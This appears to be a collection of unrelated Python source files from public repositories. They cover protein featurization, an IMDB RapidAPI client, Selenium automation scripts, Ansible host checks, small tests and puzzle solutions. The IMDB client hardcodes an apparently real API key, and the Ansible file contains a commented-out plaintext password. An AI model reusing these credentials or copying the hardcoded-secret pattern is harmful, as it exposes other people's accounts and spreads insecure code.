backbone graphs.\n\"\"\"\nimport numpy as np\nfrom rdkit import Chem\nfrom typing import List, Union, Set, Any\nfrom Bio.PDB.Residue import Residue\nfrom Bio.PDB.DSSP import dssp_dict_from_pdb_file\nfrom typing import List, Tuple, Dict\n\nfrom holoprot.feat import SECONDARY_STRUCTS, AMINO_ACIDS, ATOM_LIST\nfrom holoprot.feat import IMP_VALENCE, EXP_VALENCE, DEGREES, ATOM_FDIM\nfrom holoprot.feat import BOND_FDIM, BOND_TYPES\n\nidxfunc = lambda a: a.GetAtomMapNum() - 1\nbond_idx_fn = lambda a, b, mol: mol.GetBondBetweenAtoms(a.GetIdx(), b.GetIdx()).GetIdx()\n\nclass ResidueProp(object):\n \"\"\"Wrapper class that holds all attributes of a protein residue.\"\"\"\n\n def __init__(self,\n residue: Residue,\n sec: str,\n sas: float,\n hydrophobicity: float,\n res_depth: float = None,\n ca_depth: float = None) -> None:\n \"\"\"\n Parameters\n ----------\n residue: Residue,\n Instance of the Bio.PDB.Residue.Residue\n sec: str,\n Single letter indicating the secondary structure. Refer SECONDARY_STRUCTS\n above for possible codes.\n sas: float,\n Solvent accessible surface area (TODO: (vsomnath): Normalize?)\n res_depth: float,\n Depth of residue, calculated as average depth of all atoms\n ca_depth: float,\n Depth of Calpha atom of the residue\n \"\"\"\n self.name = residue.get_resname()\n self.sec = sec\n self.sas = sas\n self.res_depth = res_depth\n self.ca_depth = ca_depth\n self.hydrophobicity = hydrophobicity # Hydrophobicity using the Kyte-Doolittle scale\n\n\nclass AtomProp(object):\n \"\"\"Wrapper class that holds all properties of an atom.\"\"\"\n\n def __init__(self, atom: Chem.Atom) -> None:\n \"\"\"\n Parameters\n ----------\n atom: Chem.Atom,\n Instance of rdkit.Chem.Atom\n \"\"\"\n self.symbol = atom.GetSymbol()\n self.degree = atom.GetDegree()\n self.exp_valence = atom.GetExplicitValence()\n self.imp_valence = atom.GetImplicitValence()\n self.is_aromatic = atom.GetIsAromatic()\n\n\nclass BondProp(object):\n \"\"\"Wrapper class that holds all properties of a bond.\"\"\"\n\n def __init__(self, bond: Chem.Bond) -> None:\n \"\"\"\n Parameters\n ----------\n bond: Chem.Bond,\n Instance of rdkit.Chem.Bond\n \"\"\"\n self.bond_type = bond.GetBondType()\n self.is_conj = bond.GetIsConjugated()\n self.is_ring = bond.IsInRing()\n\n\ndef onek_encoding_unk(x: Any, allowable_set: Union[List, Set]) -> List:\n \"\"\"Converts x to one hot encoding.\n\n Parameters\n ----------\n x: Any,\n An element of any type\n allowable_set: Union[List, Set]\n Allowable element collection\n\n Returns\n -------\n list, indicating the one hot encoding of x in allowable_set\n \"\"\"\n if x not in allowable_set:\n x = allowable_set[-1]\n return list(map(lambda s: float(x == s), allowable_set))\n\n\ndef get_atom_features(atom_prop: AtomProp, **kwargs) -> np.ndarray:\n \"\"\"\n Get atom features. The atom features computed\n\n Parameters\n ----------\n atom: Chem.Atom,\n Atom object from RDKit\n\n Returns\n -------\n atom_features: np.ndarray,\n Array of atom features\n \"\"\"\n if atom_prop == \"*\":\n return np.array([0] * ATOM_FDIM)\n atom_features = np.array(\n onek_encoding_unk(atom_prop.symbol, ATOM_LIST) +\n onek_encoding_unk(atom_prop.degree, DEGREES) +\n onek_encoding_unk(atom_prop.exp_valence, EXP_VALENCE) +\n onek_encoding_unk(atom_prop.imp_valence, IMP_VALENCE) +\n [float(atom_prop.is_aromatic)])\n return atom_features\n\n\ndef get_bond_features(bond_prop: BondProp, **kwargs) -> np.ndarray:\n \"\"\"\n Get bond features. Features computed are a one hot encoding of the bond type,\n its aromaticity and ring membership.\n\n Parameters\n ----------\n bond: Chem.Bond,\n bond object\n\n Returns\n -------\n bond_features: np.ndarray,\n Array of bond features\n \"\"\"\n if bond_prop == \"*\":\n return np.array([0] * BOND_FDIM)\n bt = bond_prop.bond_type\n bond_features = [float(bt == bond_type) for bond_type in BOND_TYPES[1:]]\n bond_features.extend([float(bond_prop.is_conj), float(bond_prop.is_ring)])\n bond_features = np.array(bond_features, dtype=np.float32)\n return bond_features\n\n\ndef get_residue_features(residue_prop: ResidueProp,\n use_depth: bool = False,\n **kwargs) -> np.ndarray:\n \"\"\"Get residue features.\n\n Parameters\n ----------\n residue_prop: ResidueProp\n Instance of the ResidueProp class that captures properties of a residue\n\n Returns\n -------\n res_features: np.ndarray,\n Array of residue features\n \"\"\"\n if residue_prop == \"*\":\n if use_depth:\n return np.array(\n [0] * (len(AMINO_ACIDS) + len(SECONDARY_STRUCTS) + 4))\n else:\n return np.array(\n [0] * (len(AMINO_ACIDS) + len(SECONDARY_STRUCTS) + 2))\n res_features = onek_encoding_unk(residue_prop.name, AMINO_ACIDS) + \\\n onek_encoding_unk(residue_prop.sec.upper(), SECONDARY_STRUCTS) + \\\n [residue_prop.sas, residue_prop.hydrophobicity]\n if use_depth:\n res_features.extend([residue_prop.res_depth, residue_prop.ca_depth])\n res_features = np.array(res_features)\n return res_features\n\n\ndef compute_normal(residue: Residue) -> np.ndarray:\n \"\"\"\n Compute the normal vector for a given residue. The normal vector is estimated\n as the cross product of the vectors formed by the difference of Calpha, C and\n O coordinates. The normal vector is length normalized to get a unit vector.\n\n Parameters\n ----------\n residue: Residue,\n Residue for which we want to compute normal\n\n Returns\n -------\n normal: np.ndarray,\n The normal vector for the residue\n \"\"\"\n x_ca = residue['CA'].get_coord()\n x_c = residue['C'].get_coord()\n x_o = residue['O'].get_coord()\n x_oc = x_o - x_c\n x_cac = x_ca - x_c\n normal = np.cross(x_oc, x_cac)\n normal /= (np.sqrt(np.sum(normal**2) + 1e-8)) # Normalize by length\n return normal\n\n\ndef compute_angle(residue_pair: Tuple[Residue]) -> float:\n \"\"\"\n Compute the angle between two residues. The angle is estimated as the cosine\n inverse of the dot product between the normal vectors of the two residues. The\n angle is normalized by dividing it by 2 * \\pi\n\n Parameters\n ----------\n residue_pair: Tuple[Residue]\n The pair of residues between which we want to estimate the angle.\n\n Returns\n -------\n normalized angle (float) between the residues\n \"\"\"\n res_i, res_j = residue_pair\n norm_i = compute_normal(res_i)\n norm_j = compute_normal(res_j)\n\n angle = np.arccos(norm_i.dot(norm_j))\n return angle / (2 * np.pi)\n\n\ndef get_contact_features(residue_pair: Tuple[Residue],\n mode: str = 'ca',\n sigma: float = 0.01,\n **kwargs) -> np.ndarray:\n \"\"\"\n Gets contact features. The features computed are the RBF kernel over the\n distance between residues and the angle between the residues. The RBF kernel's\n width is modulated by the parameter `sigma`, and the mode to compute distance\n is controlled by `mode` argument.\n\n Parameters\n ----------\n residue_pair: Tuple[Residue],\n pass\n mode: str, (default ca)\n Compute distance between two residues. Allowed options are\n `ca` (distance between calpha atoms) and `com` (distance between\n center of masses of residues)\n sigma: float\n Width of the gaussian kernel over the contact.\n\n Returns\n -------\n edge_features: np.ndarray,\n Features of the contact between residues\n \"\"\"\n if residue_pair == \"*\":\n return np.array([0, 0])\n\n res_i, res_j = residue_pair\n if mode == 'ca':\n coord_i = res_i['CA'].get_coord()\n coord_j = res_j['CA'].get_coord()\n\n elif mode == 'com':\n coord_i = np.mean(\n [atom.get_coord() for atom in res_i.get_list()], axis=0)\n coord_j = np.mean(\n [atom.get_coord() for atom in res_j.get_list()], axis=0)\n\n else:\n raise ValueError(\n f\"Computing distance with mode {mode} is not supported.\")\n\n y = coord_i - coord_j\n dist = np.exp(-np.sum(y**2) / sigma**2)\n angle = compute_angle(residue_pair)\n\n edge_features = np.array([dist, angle])\n return edge_features\n\n\ndef get_secondary_struct_features(pdb_file: str,\n dssp_bin: str = 'dssp') -> Dict[str, List]:\n \"\"\"Compute secondary structure features for the protein using DSSP.\n\n Parameters\n ----------\n pdb_file: str,\n PDB file for the protein.\n dssp_bin: str,\n Path to the DSSP binary executable\n\n Returns\n -------\n dssp_dict: Dict[str, List]\n Dictionary containing the secondary structure features for residues\n \"\"\"\n dssp_dict = dssp_dict_from_pdb_file(pdb_file, DSSP=dssp_bin)[0]\n return dssp_dict","repo_name":"vsomnath/holoprot","sub_path":"holoprot/feat/complex.py","file_name":"complex.py","file_ext":"py","file_size_in_byte":9298,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"35"} +{"seq_id":"29526546357","text":"import requests\nimport json\n\n\n\nHOST_NAME = \"imdb8.p.rapidapi.com\"\nAPI_KEY = \"1a0ac83834mshc4bf97497c9d5a6p1a373ejsn14e832e9607e\"\n\ndef __init__(self, year):\n \n HOST_NAME = \"imdb8.p.rapidapi.com\"\n API_KEY = \"1a0ac83834mshc4bf97497c9d5a6p1a373ejsn14e832e9607e\"\n\ndef get_movie_id(movie_name):\n '''\n Gets the id of a movie which can be used to get info from IMDB rapidAPI about that movie\n \n Parameters:\n movie_name(String): The name of a movie\n Returns:\n \n String\n The id of a movie used in IMDB api (eg. 'tt1049413')\n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/find\"\n \n querystring = {\"q\":movie_name}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n data = response.json()\n data = data[\"results\"][0][\"id\"]\n return(data[7:-1])\n\n#print(get_movie_id(\"Up\"))\n#/title/tt0110912/\n\n\ndef get_plot_overview(movie_id):\n '''\n Gets the plot overview of a movie from IMDB rapidAPI \n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n The plot overview of a movie \n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-overview-details\"\n # get the id of given movie\n #movie_id = get_movie_id(movie_id)\n querystring = {\"tconst\":movie_id,\"currentCountry\":\"US\"}\n\n #print(movie_id)\n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n plot_overview = response.json()\n #print(plot_overview)\n plot_overview = plot_overview[\"plotSummary\"][\"text\"]\n return (plot_overview)\n\n#print(get_plot_overview(\"tt0110912\"))\n\ndef get_top_100():\n '''\n Gets the top 100 IMDB movies from IMDB rapidAPI \n \n Parameters:\n None\n Returns:\n \n List\n A list of 1oo strings of movie id's \n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-most-popular-movies\"\n \n querystring = {\"purchaseCountry\":\"US\",\"homeCountry\":\"US\",\"currentCountry\":\"US\"}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n top_100_id = []\n for i in response:\n top_100_id.append(i[7:-1])\n return(top_100_id)\n \n#print(get_top_100())\n\ndef get_short_plot(movie_id):\n '''\n Gets the plot overview of a movie from IMDB rapidAPI \n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n A short plot overview of a movie \n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-plots\"\n \n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n plot = response[\"plots\"][0][\"text\"]\n return(plot)\n \n#print(get_short_plot(\"tt0110912\"))\n\ndef get_medium_plot(movie_id):\n '''\n Gets the plot overview of a movie from IMDB rapidAPI \n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n A short plot overview of a movie \n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-plots\"\n \n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n plot = response[\"plots\"][1][\"text\"]\n return(plot)\n \n#print(get_medium_plot(\"tt0110912\"))\n#\n#def get_long_plot(movie_id):\n# url = \"https://imdb8.p.rapidapi.com/title/get-plots\"\n# \n# querystring = {\"tconst\":movie_id}\n# \n# headers = {\n# 'x-rapidapi-host': HOST_NAME,\n# 'x-rapidapi-key': API_KEY\n# }\n# \n# response = requests.request(\"GET\", url, headers=headers, params=querystring)\n# response = response.json()\n# plot = response[\"plots\"][2][\"text\"]\n# return(plot)\n# \n#print(get_long_plot(\"tt0110912\"))\n\ndef get_movie_year(movie_id):\n '''\n Gets the year of release of a movie from IMDB rapidAPI \n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n Integer\n The year of a movie\n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n movie_year = response[\"year\"]\n \n return(movie_year)\n\n#print(get_movie_year(\"tt0110912\"))\n\n\ndef get_movie_title(movie_id):\n '''\n Gets the title of a movie from IMDB rapidAPI from it's ID\n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n The title of a movie\n \n '''\n \n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n movie_title = response[\"title\"]\n \n return(movie_title)\n\n#print(get_movie_title(\"tt0110912\"))\n\ndef get_movie_details(movie_id):\n '''\n Gets all details of a movie from IMDB rapidAPI from it's ID\n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n JSON\n JSON list containing movie title, id, image URL, image width, running time in minutes, title, title type and year\n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n movie_details = response.json()\n #movie_title = response[\"title\"]\n \n return(movie_details)\n \n#print(get_movie_details(\"tt0110912\"))\n\ndef get_running_time(movie_id):\n '''\n Gets the running time of a movie from IMDB rapidAPI from it's ID\n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n The running time in minutes of a movie\n \n '''\n \n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n movie_running_time = response[\"runningTimeInMinutes\"]\n \n return(movie_running_time)\n\n#print(get_running_time(\"tt0110912\"))\n\ndef get_poster_url(movie_id):\n '''\n Gets the URL which contains the poster of a movie from IMDB rapidAPI from it's ID\n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n The URL of a movie poster\n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n poster_url = response[\"image\"][\"url\"]\n \n return(poster_url)\n\n#print(get_poster_url(\"tt0110912\"))\n\n\n##NOT WORKING!!!\ndef get_actor_pic_url(actor_id):\n '''\n Gets the URL of an actor from IMDB rapidAPI from it's ID\n \n Parameters:\n actor_id(String): The id of an actor\n Returns:\n \n String\n The URL of a picture of an actor\n \n '''\n url = \"https://imdb8.p.rapidapi.com/actors/get-bio\"\n\n querystring = {\"nconst\":actor_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n actor_pic_url = response[\"image\"][\"url\"]\n \n return(actor_pic_url)\n\n#print(get_actor_pic_url(\"nm0001667\"))\n","repo_name":"karlgospel/IMDB_Movie_API","sub_path":"api_movies.py","file_name":"api_movies.py","file_ext":"py","file_size_in_byte":8822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19933078224","text":"#encoding:utf-8\n\nfrom selenium import webdriver\nimport time\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\ndirver_path = r\"C:\\www\\chromedriver\\chromedriver.exe\"\n\ndriver = webdriver.Chrome(executable_path=dirver_path)\ndriver.get(\"https://www.baidu.com/\")\ninputTag = driver.find_element_by_id('kw')\nsubTag = driver.find_element_by_id('su')\n\nactions = ActionChains(driver)\n#让输入框获取焦点\nactions.move_to_element(inputTag)\nactions.send_keys_to_element(inputTag,'苍老师现在怎么样了')\nactions.move_to_element(subTag)\nactions.click(subTag)\n\nactions.perform()","repo_name":"gaohj/szpython_1812","sub_path":"day6/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36946542857","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common import keys\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.common.exceptions import NoSuchElementException\r\n\r\n\r\ndriver = webdriver.Chrome('C:\\\\webdrivers\\\\chromedriver.exe')\r\ndriver.get('https://www.speedtypingonline.com/typing-test')\r\n \r\nfor j in range(1, 10000000):\r\n for i in range(0, 4):\r\n for k in range(1, 1000): \r\n try:\r\n toSend = driver.find_element_by_xpath('//*[@id=\"blockLine'+str(i)+'\"]/span['+str(k)+']').text\r\n except NoSuchElementException:\r\n break\r\n\r\n if(toSend == ' '):\r\n toSend = ' '\r\n actions = ActionChains(driver)\r\n actions.send_keys(toSend)\r\n actions.perform()\r\n \r\n","repo_name":"Zachariah-Abraham/speedtypingonline_bot","sub_path":"ST.py","file_name":"ST.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"8410000657","text":"#!/usr/bin/python3\n#-*-coding:utf-8-*-\n\n__all__ = ['log', 'filehash', 'filetime', 'pathmake']\n\nimport os\nimport time\nimport socket\nimport hashlib\nimport threading\nimport uuid\n\n'''日志内容统一输出'''\ntlock = threading.Lock()\ndef log(txt):\n tlock.acquire()\n print(\"\" + time.strftime('%Y-%m-%d %H:%M:%S') + \" \" + format(txt))\n tlock.release()\n\n'''文件的哈希值sha1计算'''\ndef filehash(fp):\n if not os.path.isfile(fp):\n return ''\n \n while True:\n try:\n f = open(fp, 'rb')\n except PermissionError:\n time.sleep(1)\n continue\n else:\n break\n \n hh = hashlib.sha1()\n while True:\n b = f.read(8096)\n if not b:\n break\n hh.update(b)\n f.close()\n return hh.hexdigest()\n\n\n'''判断文件是否完整'''\n'''\ndef fileover(fp):\n #若文件大小正在变动则延迟一下PermissionError\n s1, s2 = 0, 1\n while s1 != s2:\n print(s1)\n s1 = os.stat(fp).st_size\n time.sleep(1)\n s2 = os.stat(fp).st_size\n return s1\nfileover(r'D:\\shell\\test\\Y470Y470PY570_WIN7x64.exe')\n'''\n \n'''无异常递归移动文件或文件夹'''\n'''def surechange(path):\n pass'''\n\n'''无异常递归删除文件或文件夹'''\n'''def suredelete(path):\n pass'''\n\n'''无异常递归创建文件夹'''\n'''def surecreate(path, fp=None):\n try:\n os.makedirs(path)\n except FileExistsError:\n pass\n return True'''\n\n'''\n获取可视化文件尺寸\nB/KB/MB/GB/TP/PB/EB/ZB/YB/BB\n'''\ndef getsize(byte, assoc=False):\n assert byte >=0\n size, unit = (0, 'B')\n if byte < 1024:\n size, unit = (byte, 'B')\n elif byte/1024 < 1024 :\n size, unit = (byte/1024, 'KB')\n elif byte/1048576 < 1024 :\n size, unit = (byte/1024/1024, 'MB')\n elif byte/1073741824 <= 1024 :\n size, unit = (byte/1024/1024/1024, 'GB')\n elif byte / 1099511627776 <= 1024 :\n size, unit = (byte/1024/1024/1024/1024, 'TB')\n else:\n size, unit = (byte/1125899906842624, 'PB')\n\n if assoc == True:\n return (size, unit)\n\n return '%.2f %s'%(size, unit)\n\n\ndef getname():\n return socket.getfqdn(socket.gethostname())\n\ndef getip(ifname='lo', ipv6=False):\n #环回地址:局域网IP\n return socket.gethostbyname(socket.getfqdn(socket.gethostname()))\n \n #主机地址:城域网IP\n '''import fcntl, struct\n skt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n inet = fcntl.ioctl(skt.fileno(), 0x8915, struct.pack('256s',ifname[:15]))\n return socket.inet_ntoa(inet[20:24])'''\n\ndef getmac(sep='-'):\n mac = uuid.UUID(int=uuid.getnode()).hex[-12:]\n return sep.join([mac[e:e+2] for e in range(0,11,2)]).upper()\n\n\n'''根据主机ID和序列号产生当前机器的唯一标识符'''\ndef computer():\n return str(uuid.uuid1())\n\n'''产生随机UUID'''\ndef uniqid():\n return str(uuid.uuid4().hex)\n\n \nif __name__ == '__main__':\n log(\"RUN:\")\n log(filehash('utils.py'))\n\n\n #surechange(r'D:\\shell\\test\\dd')\n #suredelete(r'D:\\shell\\test\\dd')\n #surecreate(r'D:\\shell\\test\\dd')\n\n print(getsize(1024))\n print(getsize(1048576))\n print(getsize(1073741824))\n print(getsize(1099511627776))\n\n\n print(getname())\n print(getip())\n print(getmac())\n\n print(computer())\n print(uniqid())\n\n","repo_name":"backtent/syncfiles","sub_path":"lansync/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"27485013932","text":"import argparse\n\nfrom utils import read_trans_prompts, read_transfile\n\n\ndef get_data(fname: str, srcfname: str, tgtfname: str, prefix: str) -> None:\n \"\"\"\n This converts data in the shared task format into standard machine translation format (one sentence per line, languages in separate files.)\n For training data, it combines the prompt with all accepted translations. \n For dev or test data, it combines the prompt only with the most popular translation.\n \"\"\"\n\n with open(fname) as f:\n lines = f.readlines()\n d = read_transfile(lines, strip_punc=False, weighted=True)\n id_text = dict(read_trans_prompts(lines))\n\n with open(srcfname, \"w\") as src, open(tgtfname, \"w\") as tgt:\n for idstring in d.keys():\n\n # prompt is combination of id and text.\n prompt = id_text[idstring]\n ats = d[idstring]\n\n # make sure that the first element is the largest.\n ats = sorted(ats.items(), key=lambda p: p[1], reverse=True)\n\n # if it is train\n if prefix == \"train\":\n # write all pairs.\n for p in ats:\n print(prompt, file=src)\n print(p[0], file=tgt)\n else:\n # write just the first pair (evaluate only on first line.)\n top_ranked_text = ats[0][0]\n print(prompt, file=src)\n print(top_ranked_text, file=tgt)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\"This converts data in the shared task format into standard machine translation format (one sentence per line, languages in separate files.)\")\n parser.add_argument(\"--fname\", help=\"Path of shared task file (probably something like train.en_vi.2020-01-13.gold.txt)\", required=True)\n parser.add_argument(\"--srcfname\", help=\"Name of desired src file, probably something like train_sents.en\", required=True)\n parser.add_argument(\"--tgtfname\", help=\"Name of desired tgt file, probably something like train_sents.vi\", required=True)\n parser.add_argument(\"--prefix\", help=\"One of [train, dev, test]\", choices=[\"train\", \"dev\", \"test\"])\n args = parser.parse_args()\n\n get_data(args.fname, args.srcfname, args.tgtfname, args.prefix)\n","repo_name":"duolingo/duolingo-sharedtask-2020","sub_path":"get_traintest_data.py","file_name":"get_traintest_data.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"35"} +{"seq_id":"9863162868","text":"from flask import Flask, render_template, url_for\napp = Flask(__name__)\n\nposts = [\n {\n 'author': 'Hameem N',\n 'title': 'Corona Teport',\n 'content': 'First post content',\n 'date_posted': 'April 20, 2018'\n },\n {\n 'author': 'Abc',\n 'title': 'dsdsdsd',\n 'content': 'Second post content',\n 'date_posted': 'April 21, 2018'\n }\n]\n\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n return render_template('home.html', posts=posts)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html', title='About')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"hameemtirur/Corona","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19067807524","text":"# ~*~ coding: utf-8 ~*~\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nimport json\nfrom django.views.decorators.csrf import csrf_protect\nimport os\n\nimport unittest\nimport sys\nimport re\n\nsys.path.insert(0, \"../..\")\n\nfrom ops.ansible.runner import AdHocRunner, CommandRunner\nfrom ops.ansible.inventory import BaseInventory\n\nhost_data = [\n {\n \"hostname\": \"keepalived1\",\n \"ip\": \"172.20.100.68\",\n \"port\": 22,\n \"username\": \"root\",\n \"groups\": [\"keepalived\"],\n #\"password\": \"stu@python\",\n },\n {\n \"hostname\": \"keepalived2\",\n \"ip\": \"172.20.100.71\",\n \"port\": 22,\n \"username\": \"root\",\n \"groups\": [\"keepalived\"],\n #\"password\": \"stu@python\",\n }\n]\n\ndef keepnet(request):\n return render(request, \"architecture/keepnet.html\")\n\n\nclass GetKeepIpaddr():\n def setUp(self):\n inventory = BaseInventory(host_data)\n runner = AdHocRunner(inventory)\n \n tasks = [\n {\"action\": {\"module\": \"shell\", \"args\": \"ip addr\"}, \"name\": \"ip_addr\"},\n {\"action\": {\"module\": \"shell\", \"args\": \"systemctl status keepalived\"}, \"name\": \"keepalived_ip\" },\n ]\n ret = runner.run(tasks, \"all\")\n keepIpList = []\n for x,y in ret.results_raw[\"ok\"].items():\n if re.search('Sending gratuitous ARP', y['keepalived_ip']['stdout'].split('\\n')[-1]):\n keepIpList.append(\n [y['keepalived_ip']['stdout'].split('\\n')[-1]+ \"
    ++
    \",\n y['ip_addr']['stdout'].split('2: eth0')[-1].replace(\"\\n\", \"
    \")]\n )\n \n return keepIpList\n\ndef get_keep(request):\n if request.is_ajax():\n getIpaddr = GetKeepIpaddr()\n if getIpaddr.setUp() == []:\n receipt = json.dumps({\"status\": 1, \"info\": \"没有查询到或内部错误!\"})\n else:\n receipt = json.dumps({\"status\": 1, \"info\": getIpaddr.setUp()})\n\n return HttpResponse(receipt)\n","repo_name":"itcp/ly-cmdb","sub_path":"apps/architecture/views/keepnet.py","file_name":"keepnet.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"16347571923","text":"import unittest\n\nclass test_file(unittest.TestCase):\n\n def test_write01(self):\n file01 = open(\"file01.txt\", \"w\", encoding='utf-8')\n num = file01.write( \"第一行 \\n 第二行\" )\n print(num)\n file01.close()\n\n def test_write02(self):\n file02 = open(\"file02.txt\", \"rb+\")\n file02.write( b\"ancasgsdgdfkgktwelwklkerkgkjgksljr\" )\n # 移动到文件的第六个字节\n file02.seek(5)\n str01 = file02.read(1)\n print(str01)\n # 移动到文件的倒数第三字节\n file02.seek(-3, 2)\n str02 = file02.read(1)\n print(str02)\n file02.close()\n\n def test_read01(self):\n file01 = open(\"file01.txt\", \"r\", encoding='utf-8')\n str01 = file01.read()\n print(str01)\n file01.close()\n\n def test_read02(self):\n file02 = open(\"file01.txt\", \"r\", encoding='utf-8')\n str02 = file02.readline()\n print(str02)\n file02.close()\n\n def test_read03(self):\n file03 = open(\"file01.txt\", \"r\", encoding='utf-8')\n str03 = file03.readlines()\n print(str03)\n file03.close()\n\n def test_read04(self):\n file04 = open(\"file01.txt\", \"r\", encoding='utf-8')\n for line in file04:\n print(line, end='')\n file04.close()","repo_name":"ghoobo/python_study","sub_path":"com/ghoobo/basis/test_12_file.py","file_name":"test_12_file.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4895609779","text":"# coding: utf-8\n\n# p(k) = p(k-1) + p(k-2) - p(k-5) - p(k-7) + p(k-12) + p(k-15) ...\n# 1, 2, 5, 7, ... は一般五角数\n#\n# https://ja.wikipedia.org/wiki/%E5%88%86%E5%89%B2%E6%95%B0\n\nfrom itertools import count, takewhile, cycle\n\n\ndef gen_ex_pentagonal():\n '''拡張五角数を生成する.'''\n for k in count(1):\n n = (3 * k - 1) * k // 2\n yield n\n\n # f(k) = (3k^2 - k) / 2 ==>\n # f(-k) = (3k^2 + k) / 2 ==>\n # = f(k) + k\n n += k\n yield n\n\n\ndef main():\n N = 10**6\n partitions = [1]\n signs = (1, 1, -1, -1)\n for n in count(1):\n p_n = 0\n for sign, k in zip(cycle(signs),\n takewhile(lambda k: k <= n, gen_ex_pentagonal())):\n p_n = (p_n + sign * partitions[n - k]) % N\n if p_n == 0:\n return n\n partitions.append(p_n)\n\n\nif __name__ == '__main__':\n print(main())\n","repo_name":"AkihikoTakahashi/ProjectEuler","sub_path":"Problem078.py","file_name":"Problem078.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27082646297","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\nfrom itertools import combinations\n\n# Complete the maximumPerimeterTriangle function below.\ndef maximumPerimeterTriangle(sticks):\n sticks_s = sticks\n perimeter = 0\n lengths = [-1]\n for i, j, k in combinations(range(len(sticks_s)), 3):\n s_i = sticks_s[i]\n s_j = sticks_s[j]\n s_k = sticks_s[k]\n aux_l = sorted([s_k, s_j, s_i])\n aux = sum(aux_l)\n if aux_l[0] + aux_l[1] > aux_l[2] and aux > perimeter:\n lengths = aux_l\n perimeter = aux\n \n return 